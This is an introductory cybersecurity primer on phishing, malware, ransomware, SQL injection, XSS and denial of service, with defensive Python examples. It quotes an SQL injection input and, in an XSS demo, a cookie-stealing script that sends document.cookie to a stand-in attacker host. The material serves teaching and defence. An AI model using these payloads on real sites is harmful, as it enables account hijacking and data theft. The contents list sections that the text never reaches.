Cyberattacks 101

Contents

Cyberattacks 101
Phishing Attacks
  Phishing
Spear Phishing Attacks
Whale Phishing Attack
Malware Attacks
Ransomware
Drive-by Attack
Trojan Horses
Web Attacks
SQL Injection
Zero-day exploit
Password attack
What Is Ransomware?
How do I protect myself from ransomware?
  Back up all your data
  Patch your systems
  Educate users on attack sources
  Protect your network
  Segment network access
  Keep a close eye on network activity
  Prevent initial infiltration
  Arm your endpoints
  Gain real-time threat intelligence
  Say no to ransom
Cross Site Scripting
Denial-of-service attack
Distributed Denial-of-Service (DDoS) attack?
TCP SYN flood attack
Teardrop attack
Smurf attack
Ping of death attack
Botnets
Password Attack
Eavesdropping Attack
Birthday attack
Insider Threats
Man-in-the-Middle (MITM) Attacks
AI-Powered Attacks
Session Hijacking and Man-in-the-Middle Attacks
IP Spoofing
Replay
What is High Orbit Ion Cannon (HOIC)
  Attack description

A cyber-attack is any type of offensive action that targets computer information systems,
infrastructures, computer networks or personal computer devices, using various methods to steal,
alter or destroy data or information systems.

Phishing Attacks
Phishing is a type of social engineering usually employed to steal user data such as credit card
numbers and login credentials. It happens when an attacker, posing as a trusted individual, tricks
the victim into opening a text message, email, or instant message. The victim is then deceived into
opening a malicious link, which can lead to a system being frozen as part of a ransomware attack,
sensitive information being revealed, or malware being installed.

This breach can have disastrous results. For an individual, this includes identity theft, stealing of
funds, or unauthorized purchases.

Phishing is often used to obtain a foothold in governmental or corporate networks as part of a
more significant plot such as an advanced persistent threat (APT). In such a case, employees are
compromised in order to gain privileged access to secured data, distribute malware in a closed
environment, and bypass security perimeters.

Phishing

Phishing is the practice of sending fraudulent communications that appear to come from a
reputable source, usually through email. The goal is to steal sensitive data like credit card and
login information or to install malware on the victim’s machine. Phishing is an increasingly
common cyberthreat.

Of course, chances are you wouldn't just open a random attachment or click on a link in any
email that comes your way—there has to be a compelling reason for you to take action.
Attackers know this, too. When an attacker wants you to install malware or divulge
sensitive information, they often turn to phishing tactics, or pretending to be someone or
something else to get you to take an action you normally wouldn’t. Since they rely on
human curiosity and impulses, phishing attacks can be difficult to stop.

In a phishing attack, an attacker may send you an email that appears to be from someone
you trust, like your boss or a company you do business with. The email will seem
legitimate, and it will have some urgency to it (e.g. fraudulent activity has been detected on
your account). In the email, there will be an attachment to open or a link to click. Opening
the malicious attachment installs malware on your computer. If you click the link, it may
send you to a legitimate-looking website that asks you to log in to access an important
file—except the website is actually a trap used to capture your credentials when you try to
log in.

To combat phishing attempts, it is essential to understand the importance of verifying email
senders and attachments/links.

Spear Phishing Attacks
Spear phishing is an email aimed at a particular individual or organization, seeking unauthorized
access to crucial information. These hacks are not executed by random attackers but are most
likely carried out by individuals after trade secrets, financial gain, or military intelligence.

Spear phishing emails appear to originate from an individual within the recipient’s own
organization or someone the target knows personally. Quite often, government-sponsored
hacktivists and hackers perform these activities. Cybercriminals also carry out these attacks with
the aim of reselling confidential data to private companies and governments. These attackers
employ social engineering and individually designed approaches to personalize websites and
messages effectively.

Phishing and spear phishing attacks

A phishing attack is the practice of sending emails that appear to be from trusted sources with the
goal of gaining personal information or influencing users to do something. It combines social
engineering and technical trickery. It could involve an attachment to an email that loads malware
onto your computer. It could also be a link to an illegitimate website that can trick you into
downloading malware or handing over your personal information.

Spear phishing is a very targeted type of phishing activity. Attackers take the time to conduct
research into targets and create messages that are personal and relevant. Because of this, spear
phishing can be very hard to identify and even harder to defend against. One of the simplest
ways that a hacker can conduct a spear phishing attack is email spoofing, which is when the
information in the “From” section of the email is falsified, making it appear as if it is coming
from someone you know, such as your management or your partner company. Another technique
that scammers use to add credibility to their story is website cloning — they copy legitimate
websites to fool you into entering personally identifiable information (PII) or login credentials.

To reduce the risk of being phished, you can use these techniques:

- Critical thinking — Do not accept that an email is the real deal just because you’re busy
or stressed or you have 150 other unread messages in your inbox. Stop for a minute and
analyze the email.
- Hovering over the links — Move your mouse over the link, but do not click it! Just let
your mouse cursor rest over the link and see where it would actually take you. Apply critical
thinking to decipher the URL.
- Analyzing email headers — Email headers define how an email got to your address.
The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
in the email.
- Sandboxing — You can test email content in a sandbox environment, logging activity
from opening the attachment or clicking the links inside the email.
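The header and link checks from the list above, as an added example (this is not code from the original document): it parses a constructed sample message with Python's standard email and html.parser modules, compares the From, Reply-To and Return-Path domains, and flags any link whose visible text advertises a different domain than its href. All domain names in the sample are made up.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not a real email): the From header looks like the
# recipient's bank, but Reply-To and Return-Path point elsewhere, and the link
# text advertises one domain while the href actually goes to another.
SAMPLE_EMAIL = """From: "Example Bank Security" <alerts@example-bank.com>
Reply-To: support@mailbox-verify.example
Return-Path: <bounce@mailbox-verify.example>
To: victim@example.org
Subject: Urgent: fraudulent activity detected on your account
Content-Type: text/html

<html><body>
<p>Please confirm your identity within 24 hours:</p>
<a href="http://login.example-bank.com.mailbox-verify.example/confirm">
https://login.example-bank.com/confirm</a>
</body></html>
"""

def domain_of_address(header_value):
    """Return the lowercase domain of an address header, or None if absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else None

def registrable_domain(host):
    """Crude 'last two labels' approximation of the registrable domain.
    Good enough for this demo; a real check should use the Public Suffix List."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()

class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> elements."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def analyze_email(raw):
    """Apply the two checks from the text: Reply-To and Return-Path must agree
    with the From domain, and a link's visible text must not advertise a
    different domain than the one its href resolves to."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain_of_address(msg["From"])
    for hdr in ("Reply-To", "Return-Path"):
        dom = domain_of_address(msg[hdr])
        if dom and from_dom and registrable_domain(dom) != registrable_domain(from_dom):
            findings.append(f"{hdr} domain {dom} differs from From domain {from_dom}")
    collector = LinkCollector()
    collector.feed(msg.get_payload())
    for href, text in collector.links:
        href_host = urlparse(href).hostname or ""
        shown = re.match(r"https?://([^/\s]+)", text)
        if shown and registrable_domain(shown.group(1)) != registrable_domain(href_host):
            findings.append(f"link text shows {shown.group(1)} but href goes to {href_host}")
    return findings

if __name__ == "__main__":
    for finding in analyze_email(SAMPLE_EMAIL):
        print("SUSPICIOUS:", finding)
```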

Whale Phishing Attack
A whale phishing attack is a type of phishing that centers on high-profile employees such as the
CFO or CEO. It is aimed at stealing vital information, since those holding higher positions in a
company have unlimited access to sensitive information. Most whaling instances manipulate the
victim into permitting high-worth wire transfers to the attacker.

The term whaling signifies the size of the attack, and whales are targeted depending on their
position within the organization. Since they are highly targeted, whaling attacks are more
difficult to notice than standard phishing attacks.

In a business, system security administrators can lessen the effectiveness of such a hack by
encouraging the corporate management staff to attend security awareness training.

Malware Attacks
Malware is code made to stealthily affect a compromised computer system without the
consent of the user. This broad definition includes many particular types of malevolent software
(malware) such as spyware, ransomware, and command-and-control software.

Malware is a term used to describe malicious software, including spyware, ransomware, viruses,
and worms. Malware breaches a network through a vulnerability, typically when a user clicks a
dangerous link or email attachment that then installs risky software. Once inside the system,
malware can do the following:

- Blocks access to key components of the network (ransomware)
- Installs malware or additional harmful software
- Covertly obtains information by transmitting data from the hard drive (spyware)
- Disrupts certain components and renders the system inoperable

Many well-known businesses, states, and criminal actors have been implicated in and caught
deploying malware.

Malware differs from other software in that it can spread across a network, cause changes and
damage, remain undetectable, and be persistent in the infected system. It can destroy a network
and bring a machine’s performance to its knees.

Malicious software can be described as unwanted software that is installed in your system
without your consent. It can attach itself to legitimate code and propagate; it can lurk in useful
applications or replicate itself across the Internet. Here are some of the most common types of
malware:

- Macro viruses — These viruses infect applications such as Microsoft Word or Excel.
Macro viruses attach to an application’s initialization sequence. When the application is
opened, the virus executes instructions before transferring control to the application. The
virus replicates itself and attaches to other code in the computer system.
- File infectors — File infector viruses usually attach themselves to executable code, such
as .exe files. The virus is installed when the code is loaded. Another version of a file
infector associates itself with a file by creating a virus file with the same name but an
.exe extension. Therefore, when the file is opened, the virus code will execute.
- System or boot-record infectors — A boot-record virus attaches to the master boot
record on hard disks. When the system is started, it will look at the boot sector and load
the virus into memory, where it can propagate to other disks and computers.
- Polymorphic viruses — These viruses conceal themselves through varying cycles of
encryption and decryption. The encrypted virus and an associated mutation engine are
initially decrypted by a decryption program. The virus proceeds to infect an area of code.
The mutation engine then develops a new decryption routine, and the virus encrypts the
mutation engine and a copy of the virus with an algorithm corresponding to the new
decryption routine. The encrypted package of mutation engine and virus is attached to
new code, and the process repeats. Such viruses are difficult to detect but have a high
level of entropy because of the many modifications of their source code. Anti-virus
software or free tools like Process Hacker can use this feature to detect them.
- Stealth viruses — Stealth viruses take over system functions to conceal themselves.
They do this by compromising malware detection software so that the software will
report an infected area as being uninfected. These viruses conceal any increase in the size
of an infected file or changes to the file’s date and time of last modification.
- Trojans — A Trojan, or Trojan horse, is a program that hides in a useful program and
usually has a malicious function. A major difference between viruses and Trojans is that
Trojans do not self-replicate. In addition to launching attacks on a system, a Trojan can
establish a back door that can be exploited by attackers. For example, a Trojan can be
programmed to open a high-numbered port so the hacker can use it to listen and then
perform an attack.
- Logic bombs — A logic bomb is a type of malicious software that is appended to an
application and is triggered by a specific occurrence, such as a logical condition or a
specific date and time.
- Worms — Worms differ from viruses in that they do not attach to a host file, but are
self-contained programs that propagate across networks and computers. Worms are
commonly spread through email attachments; opening the attachment activates the worm
program. A typical worm exploit involves the worm sending a copy of itself to every
contact in an infected computer’s email address book. In addition to conducting malicious
activities, a worm spreading across the internet and overloading email servers can result
in denial-of-service attacks against nodes on the network.
- Droppers — A dropper is a program used to install viruses on computers. In many
instances, the dropper is not infected with malicious code and, therefore, might not be
detected by virus-scanning software. A dropper can also connect to the internet and
download updates to virus software that is resident on a compromised system.
- Ransomware — Ransomware is a type of malware that blocks access to the victim’s
data and threatens to publish or delete it unless a ransom is paid. While some simple
computer ransomware can lock the system in a way that is not difficult for a
knowledgeable person to reverse, more advanced malware uses a technique called
cryptoviral extortion, which encrypts the victim’s files in a way that makes them nearly
impossible to recover without the decryption key.
- Adware — Adware is a software application used by companies for marketing purposes;
advertising banners are displayed while any program is running. Adware can be
automatically downloaded to your system while browsing any website and can be viewed
through pop-up windows or through a bar that appears on the computer screen
automatically.
- Spyware — Spyware is a type of program that is installed to collect information about
users, their computers or their browsing habits. It tracks everything you do without your
knowledge and sends the data to a remote user. It also can download and install other
malicious programs from the internet. Spyware works like adware but is usually a
separate program that is installed unknowingly when you install another freeware
application.
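The list above says polymorphic viruses stand out through their high entropy and that scanners use this to spot them. As an added illustration, not code from the original document, here is a per-chunk Shannon entropy scan over a constructed file image: a plaintext decryptor stub followed by pseudo-random bytes standing in for the encrypted virus body and mutation engine. The 6.5 bits-per-byte threshold is an assumed tuning value.

```python
import math
import random

def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for a
    perfectly uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

def high_entropy_regions(data, chunk_size=512, threshold=6.5):
    """Return (offset, entropy) for every full chunk above the threshold.
    Encrypted or packed code, such as a polymorphic virus body, scores far
    above plaintext. The threshold is an assumed tuning value, not a
    published one."""
    hits = []
    for off in range(0, len(data) - chunk_size + 1, chunk_size):
        ent = shannon_entropy(data[off:off + chunk_size])
        if ent > threshold:
            hits.append((off, round(ent, 2)))
    return hits

def build_sample():
    """Constructed stand-in for a polymorphic file image (not a real sample):
    512 bytes of a plaintext decryptor stub, then 1024 pseudo-random bytes
    playing the encrypted virus body plus mutation engine. Fixed seed so the
    output is repeatable."""
    rng = random.Random(1234)
    stub = (b"mov eax, key; xor [esi], eax; loop decrypt_next; jmp body\n" * 10)[:512]
    encrypted_body = bytes(rng.getrandbits(8) for _ in range(1024))
    return stub + encrypted_body

if __name__ == "__main__":
    sample = build_sample()
    print(f"stub entropy: {shannon_entropy(sample[:512]):.2f} bits/byte")
    for off, ent in high_entropy_regions(sample):
        print(f"high-entropy chunk at offset {off:#06x}: {ent} bits/byte")
```

The stub region scores well under 5 bits per byte while both pseudo-random chunks score above 7, which is the contrast a scanner keys on.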

Ransomware
Ransomware blocks access to a victim’s data, typically threatening to delete it unless a ransom is
paid. There is no guarantee that paying a ransom will regain access to the data. Ransomware is
often carried out via a Trojan delivering a payload disguised as a legitimate file.

Drive-by Attack
A drive-by attack is a common method of distributing malware.

A cyber attacker looks for an insecure website and plants a malicious script into the PHP or HTTP
code of one of its pages. This script can install malware on the computer of anyone who visits the
website, or become an IFRAME that redirects the victim’s browser to a site controlled by the
attacker. In most cases these scripts are obfuscated, which makes the code harder for security
researchers to analyze. These attacks are known as drive-by because they don’t require any action
on the victim’s part except visiting the compromised website. When they visit the compromised
site, they automatically and silently become infected if their computer is vulnerable to the
malware, especially if they have not applied security updates to their applications.

Drive-by download attacks are a common method of spreading malware. Hackers look for
insecure websites and plant a malicious script into HTTP or PHP code on one of the pages. This
script might install malware directly onto the computer of someone who visits the site, or it
might redirect the victim to a site controlled by the hackers. Drive-by downloads can happen
when visiting a website or viewing an email message or a pop-up window. Unlike many other
types of cyber security attacks, a drive-by doesn’t rely on a user to do anything to actively enable
the attack — you don’t have to click a download button or open a malicious email attachment to
become infected. A drive-by download can take advantage of an app, operating system or web
browser that contains security flaws due to unsuccessful updates or lack of updates.

To protect yourself from drive-by attacks, you need to keep your browsers and operating systems
up to date and avoid websites that might contain malicious code. Stick to the sites you normally
use — although keep in mind that even these sites can be hacked. Don’t keep too many
unnecessary programs and apps on your device. The more plug-ins you have, the more
vulnerabilities there are that can be exploited by drive-by attacks.

Trojan Horses
A Trojan is a malicious software program that misrepresents itself to appear useful. Trojans spread
by looking like routine software and persuading a victim to install them. They are considered among
the most dangerous types of malware, as they are often designed to steal financial information.

Web Attacks
SQL Injection
SQL injection, also known as SQLI, is a kind of attack that employs malicious code to
manipulate backend databases in order to access information that was not intended for display.
This may include numerous items, including private customer details, user lists, or sensitive
company data. A Structured Query Language (SQL) injection occurs when an attacker inserts
malicious code into a server that uses SQL and forces the server to reveal information it normally
would not. An attacker could carry out a SQL injection simply by submitting malicious code into
a vulnerable website search box.

SQLI can have devastating effects on a business. A successful SQLI attack can cause deletion of
entire tables, unauthorized viewing of user lists, and in some cases, the attacker can gain
administrative access to a database. These can be highly detrimental to a business. When
calculating the probable cost of SQLI, you need to consider the loss of customer trust in case
personal information like addresses, credit card details, and phone numbers are stolen.

Although SQLI can be used to attack any SQL database, the culprits often target websites.
SQL injection has become a common issue with database-driven websites. It occurs when a
malefactor gets a SQL query executed against the database via the input data sent from the client
to the server. SQL commands are inserted into data-plane input (for example, in place of the login
or password) in order to run predefined SQL commands. A successful SQL injection exploit can
read sensitive data from the database, modify (insert, update or delete) database data, execute
administration operations (such as shutdown) on the database, recover the content of a given file,
and, in some cases, issue commands to the operating system.

For example, a web form on a website might request a user’s account name and then send it to
the database in order to pull up the associated account information using dynamic SQL like this:

    "SELECT * FROM users WHERE account = '" + userProvidedAccountNumber + "';"

While this works for users who are properly entering their account number, it leaves a hole for
attackers. For example, if someone decided to provide an account number of ' or '1' = '1,
that would result in a query string of:

    "SELECT * FROM users WHERE account = '' or '1' = '1';"

Because '1' = '1' always evaluates to TRUE, the database will return the data for all users
instead of just a single user.

The vulnerability to this type of cyber security attack depends on the fact that SQL makes no real
distinction between the control and data planes. Therefore, SQL injections work mostly if a
website uses dynamic SQL. Additionally, SQL injection is very common with PHP and ASP
applications due to the prevalence of older functional interfaces. J2EE and ASP.NET
applications are less likely to have easily exploited SQL injections because of the nature of the
programmatic interfaces available.

To protect yourself from SQL injection attacks, apply a least-privilege model of
permissions in your databases. Stick to stored procedures (make sure that these procedures don’t
include any dynamic SQL) and prepared statements (parameterized queries). The code that is
executed against the database must be strong enough to prevent injection attacks. In addition,
validate input data against a white list at the application level.
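The dynamic query from the text next to its parameterized and allow-list-validated replacements, as an added example that is not code from the original document. It uses Python's built-in sqlite3 against a constructed in-memory users table; the account numbers, names and balances are made up.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table standing in for a website's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (account TEXT, name TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1001", "alice", 250),
        ("1002", "bob", 900),
        ("1003", "carol", 75),
    ])
    return conn

def lookup_vulnerable(conn, user_provided_account_number):
    """The dynamic SQL from the text: the input is spliced into the query string,
    so the database cannot tell the user's data from the developer's SQL."""
    query = "SELECT * FROM users WHERE account = '" + user_provided_account_number + "';"
    return conn.execute(query).fetchall()

def lookup_safe(conn, user_provided_account_number):
    """Prepared statement: the input is bound as a parameter and stays in the
    data plane, so it is only ever compared as a string, never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM users WHERE account = ?;", (user_provided_account_number,)
    ).fetchall()

def is_valid_account_number(value):
    """Allow-list rule assumed for this demo: exactly four ASCII digits."""
    return value.isdigit() and len(value) == 4

def lookup_safe_validated(conn, user_provided_account_number):
    """The text's other recommendation: validate against an allow list at the
    application layer, then still use the parameterized query."""
    if not is_valid_account_number(user_provided_account_number):
        raise ValueError("account number must be exactly four digits")
    return lookup_safe(conn, user_provided_account_number)

if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1' = '1"  # the input from the text
    print("legitimate lookup  :", lookup_vulnerable(conn, "1002"))
    print("vulnerable, injected:", lookup_vulnerable(conn, payload))  # every row
    print("safe, injected      :", lookup_safe(conn, payload))        # no rows
    try:
        lookup_safe_validated(conn, payload)
    except ValueError as err:
        print("validated, injected :", err)
```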

Zero-day exploit
A zero-day exploit hits after a network vulnerability is announced but before a patch or solution
is implemented. Attackers target the disclosed vulnerability during this window of time. Zero-
day vulnerability threat detection requires constant awareness.

Password attack
Because passwords are the most commonly used mechanism to authenticate users to an
information system, obtaining passwords is a common and effective attack approach. Access to a
person’s password can be obtained by looking around the person’s desk, ‘‘sniffing’’ the
connection to the network to acquire unencrypted passwords, using social engineering, gaining
access to a password database or outright guessing. The last approach can be done in either a
random or systematic manner:

- Brute-force password guessing means using a random approach by trying different
passwords and hoping that one works. Some logic can be applied by trying passwords
related to the person’s name, job title, hobbies or similar items.
- In a dictionary attack, a dictionary of common passwords is used to attempt to gain
access to a user’s computer and network. One approach is to copy an encrypted file that
contains the passwords, apply the same encryption to a dictionary of commonly used
passwords, and compare the results.

In order to protect yourself from dictionary or brute-force attacks, you need to implement an
account lockout policy that will lock the account after a few invalid password attempts. You can
follow these account lockout best practices in order to set it up correctly.
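An account lockout policy of the kind recommended above, as an added example that is not code from the original document: failures are counted per account inside a time window, the account is locked for a fixed period once the threshold is reached, and the stored credential is a salted PBKDF2 hash so that the dictionary shortcut described above (hash a wordlist and compare) costs the attacker a slow hash per candidate. The thresholds, the user, the password and the salt are constructed values.

```python
import hashlib
import hmac
from collections import defaultdict

# Constructed demo values: a real deployment uses a random per-user salt stored
# with the credential and tunes the thresholds to its own risk appetite.
SALT = b"constructed-demo-salt"

def hash_password(password):
    """Slow, salted hash: each wordlist candidate costs 100k iterations."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

USERS = {"alice": hash_password("correct horse battery staple")}

class LockoutPolicy:
    """Locks an account after max_failures bad attempts inside window_seconds
    and keeps it locked for lockout_seconds. The caller passes the current time
    so the behaviour is deterministic and easy to test."""

    def __init__(self, max_failures=5, window_seconds=900, lockout_seconds=1800):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self._failures = defaultdict(list)  # account -> timestamps of recent failures
        self._locked_until = {}             # account -> time the lock expires

    def is_locked(self, account, now):
        return self._locked_until.get(account, 0) > now

    def record_failure(self, account, now):
        """Register a bad attempt; returns True if it tripped the lockout."""
        recent = [t for t in self._failures[account] if now - t < self.window]
        recent.append(now)
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
            self._failures[account] = []
            return True
        self._failures[account] = recent
        return False

    def record_success(self, account):
        self._failures.pop(account, None)

def attempt_login(policy, account, password, now):
    """Returns 'locked', 'ok', 'bad-password' or 'locked-now'."""
    if policy.is_locked(account, now):
        return "locked"
    # Hash even for unknown accounts so timing does not reveal which names exist.
    expected = USERS.get(account, b"\x00" * 32)
    if hmac.compare_digest(expected, hash_password(password)):
        policy.record_success(account)
        return "ok"
    return "locked-now" if policy.record_failure(account, now) else "bad-password"

if __name__ == "__main__":
    policy = LockoutPolicy(max_failures=3, window_seconds=60, lockout_seconds=120)
    attempts = [(0, "password"), (1, "123456"), (2, "letmein"),
                (3, "correct horse battery staple"), (130, "correct horse battery staple")]
    for t, pw in attempts:
        print(f"t={t:>3}s  {attempt_login(policy, 'alice', pw, t)}")
```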

What Is Ransomware?
Ransomware is a type of malicious software, also known as malware. It encrypts a victim’s data
until the attacker is paid a predetermined ransom. Typically, the attacker demands payment in a
form of cryptocurrency such as bitcoin. Only then will the attacker send a decryption key to
release the victim’s data.
A number of ransomware variants have appeared in recent years, which we’ll describe in greater
detail below. We will also explain how you can protect your system against future attacks.

How does ransomware work?

Ransomware is typically distributed through a few main avenues. These include email phishing,
malvertising (malicious advertising), and exploit kits. After it is distributed, the ransomware
encrypts selected files and notifies the victim of the required payment.

How do I protect myself from ransomware?

Back up all your data

In the event of an attack, you can power down the endpoint, reimage it, and reinstall your recent
backup. You’ll have all your data and you’ll prevent the ransomware from spreading to other
systems.

Patch your systems

Make a habit of updating your software regularly. Patching commonly exploited third-party
software will foil many attacks.

Educate users on attack sources

The weakest link in the security chain is usually human. Educate your users on whom and what
to trust. Empower them not to fall for phishing or other schemes.

Protect your network

Take a layered approach, with security infused from the endpoint to email to the DNS layer. Use
technologies such as a next-generation firewall (NGFW) or an intrusion prevention system (IPS).

Segment network access

Limit the resources that an attacker can access. By dynamically controlling access at all times,
you help ensure that your entire network is not compromised in a single attack.

Keep a close eye on network activity

Being able to see everything happening across your network and data center can help you
uncover attacks that bypass the perimeter. Deploy a demilitarized zone (DMZ) or add a layer of
security to your local area network (LAN).

Prevent initial infiltration

Most ransomware infections occur through an email attachment or a malicious download.
Diligently block malicious websites, emails, and attachments through a layered security
approach and a company-sanctioned file-sharing program.

Arm your endpoints

Antivirus solutions on your endpoints don’t suffice anymore. Set up privileges so that endpoints
are granted only the network shares and user permissions appropriate to their tasks. Two-factor
authentication will also help.

Gain real-time threat intelligence

Know your enemy. Take advantage of threat intelligence from organizations such as Talos to
understand security information and emerging cybersecurity threats.

Say no to ransom

Never, ever pay the ransom. There’s no guarantee you’ll get your data back, and you’re only
fueling the cybercriminals for more attacks.

SQL (pronounced “sequel”) stands for structured query language; it’s a programming
language used to communicate with databases. Many of the servers that store critical data
for websites and services use SQL to manage the data in their databases. A SQL injection
attack specifically targets this kind of server, using malicious code to get the server to
divulge information it normally wouldn’t. This is especially problematic if the server stores
private customer information from the website, such as credit card numbers, usernames and
passwords (credentials), or other personally identifiable information, which are tempting
and lucrative targets for an attacker.

An SQL injection attack works by exploiting any one of the known SQL vulnerabilities that
allow the SQL server to run malicious code. For example, if a SQL server is vulnerable to
an injection attack, it may be possible for an attacker to go to a website's search box and
type in code that would force the site's SQL server to dump all of its stored usernames and
passwords for the site.

Cross Site Scripting

XSS attacks use third-party web resources to run scripts in the victim’s web browser or
scriptable application. Specifically, the attacker injects a payload with malicious JavaScript into
a website’s database. When the victim requests a page from the website, the website transmits
the page, with the attacker’s payload as part of the HTML body, to the victim’s browser, which
executes the malicious script. For example, it might send the victim’s cookie to the attacker’s
server, and the attacker can extract it and use it for session hijacking. The most dangerous
consequences occur when XSS is used to exploit additional vulnerabilities. These vulnerabilities
can enable an attacker to not only steal cookies, but also log key strokes, capture screenshots,
discover and collect network information, and remotely access and control the victim’s machine.

XSS payloads have historically also been written for VBScript, ActiveX and Flash, but JavaScript is by far the most widely abused, simply because every browser runs it; the other technologies are no longer supported by current browsers.

To defend against XSS, treat every value that came from a request as untrusted before placing it in a response, whether it is reflected immediately or read back from the database later. Validate and filter input, but rely on output encoding: escape characters such as <, >, &, " and ' into their HTML entity equivalents when writing into element content or attribute values, URL-encode values written into URLs (spaces, ?, &, / and the like), and never write untrusted text directly into a script block or an event-handler attribute. The correct encoding depends on the context the value lands in, so prefer a templating engine that escapes by default over hand-written filters. Mark session cookies HttpOnly so injected script cannot read them, and deploy a Content Security Policy that disallows inline scripts to limit the damage if an injection does slip through. Asking users to disable client-side scripts is not a practical defence.
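The following is an added example, not code from the original page: a search results page rendered once without encoding and once with context-aware encoding, together with the cookie and CSP headers that limit what a successful injection can do. The two payloads and the attacker host `attacker.example` are constructed for the demonstration.

```python
import html
from urllib.parse import quote


def render_vulnerable(query, next_url):
    """Echoes the search term into three HTML contexts without encoding."""
    return (f"<p>Results for: {query}</p>\n"
            f'<input name="q" value="{query}">\n'
            f'<a href="{next_url}">next page</a>')


def safe_href(url):
    # Allow only same-site paths or https URLs. This rejects javascript: and
    # data: schemes as well as protocol-relative "//evil.example" links.
    if (url.startswith("/") and not url.startswith("//")) or url.startswith("https://"):
        return url
    return "/"


def render_safe(query, next_url):
    """Encodes for the context each value lands in: text, attribute, URL."""
    # html.escape turns < > & " ' into entities, which is the right encoding
    # for both element content and quoted attribute values.
    q = html.escape(query)
    href = html.escape(safe_href(next_url))
    return (f"<p>Results for: {q}</p>\n"
            f'<input name="q" value="{q}">\n'
            f'<a href="{href}">next page</a>')


def session_cookie_header(session_id):
    # HttpOnly keeps document.cookie from exposing the session ID, so a
    # cookie-stealing payload gets nothing; Secure and SameSite narrow it further.
    return (f"Set-Cookie: session={quote(session_id, safe='')}; "
            "HttpOnly; Secure; SameSite=Lax; Path=/")


# Without 'unsafe-inline', a browser that enforces this policy refuses to run
# an injected inline <script> or on* handler even if encoding was missed.
CSP_HEADER = ("Content-Security-Policy: default-src 'self'; script-src 'self'; "
              "object-src 'none'; base-uri 'none'")

# Constructed payloads: a cookie-stealing script for element content, an
# attribute break-out that needs no <script> tag, and a javascript: link.
STEAL_COOKIE = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
ATTR_BREAKOUT = '" autofocus onfocus="alert(document.domain)'
JS_URL = "javascript:alert(1)"

if __name__ == "__main__":
    print(render_vulnerable(STEAL_COOKIE, JS_URL))
    print(render_safe(STEAL_COOKIE, JS_URL))
    print(render_safe(ATTR_BREAKOUT, "/page/2"))
    print(session_cookie_header("s3ss10n"))
    print(CSP_HEADER)
```

Entity encoding is enough for element content and quoted attributes, but not for a value written inside a `<script>` block or an unquoted attribute; those contexts need their own encoders, and the simplest rule is not to put untrusted data there at all.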

Cross-site scripting is thus an injection attack in which the attacker gets their own script delivered inside content from an otherwise reputable website. It happens when a dubious source is allowed to attach its own code to a web application's output, and that code is bundled with the dynamic content sent to the victim's browser.

The malicious code is usually a fragment of JavaScript executed by the target's browser, although the injected markup can also carry HTML or CSS, on older browsers Flash or Java applet content, and once running it commonly abuses the site's own Ajax calls with the victim's privileges. XSS attacks can be devastating, yet the fixes for the weaknesses that enable them (output encoding, templates that escape by default, a Content Security Policy) are comparatively simple.

In a SQL injection attack, an attacker goes after a vulnerable website to reach its stored data, such as user credentials or sensitive financial data. An attacker who would rather target a website's users directly may opt for a cross-site scripting attack instead. Like SQL injection, XSS involves injecting malicious code through a website, but in this case the website itself is only the carrier: the injected code runs in the user's browser when they visit the affected page, and it goes after the visitor, not the site.

One of the most common ways an attacker can deploy a cross-site scripting attack is by
injecting malicious code into a comment or a script that could automatically run. For
example, they could embed a link to a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a website’s reputation by placing the
users' information at risk without any indication that anything malicious even occurred. Any
sensitive information a user sends to the site—such as their credentials, credit card
information, or other private data—can be hijacked via cross-site scripting without the
website owners realizing there was even a problem in the first place.

Denial-of-service attack
A denial-of-service attack floods systems, servers, or networks with traffic to exhaust resources
and bandwidth. As a result, the system is unable to fulfill legitimate requests. Attackers can also
use multiple compromised devices to launch this attack. This is known as a distributed-denial-of-
service (DDoS) attack.

Distributed Denial-of-Service (DDoS) attack


A denial-of-service (DoS) attack aims to shut down a network or service, making it inaccessible to its intended users. The attack accomplishes this either by overwhelming the target with more traffic than it can handle or by sending it crafted input that triggers a crash. In both cases the DoS onslaught denies legitimate users, such as employees, account holders and members, the resource or service they expected.

DDoS attacks are often aimed at the web servers of high-profile organisations such as trade bodies, government agencies, media companies, retailers and banks. Although a flood by itself does not steal information or other assets, mitigating it can cost a victim a great deal of money and time, and DDoS is often used as a distraction to cover other network attacks launched at the same time.

Imagine you're sitting in traffic on a one-lane country road, with cars backed up as far as the
eye can see. Normally this road never sees more than a car or two, but a county fair and a
major sporting event have ended around the same time, and this road is the only way for
visitors to leave town. The road can't handle the massive amount of traffic, and as a result it
gets so backed up that pretty much no one can leave.

That's essentially what happens to a website during a denial-of-service (DoS) attack. If you
flood a website with more traffic than it was built to handle, you'll overload the website's
server and it'll be nigh-impossible for the website to serve up its content to visitors who are
trying to access it.

This can happen for innocuous reasons of course, say if a massive news story breaks and a
newspaper's website gets overloaded with traffic from people trying to find out more. But
often, this kind of traffic overload is malicious, as an attacker floods a website with an
overwhelming amount of traffic to essentially shut it down for all users.
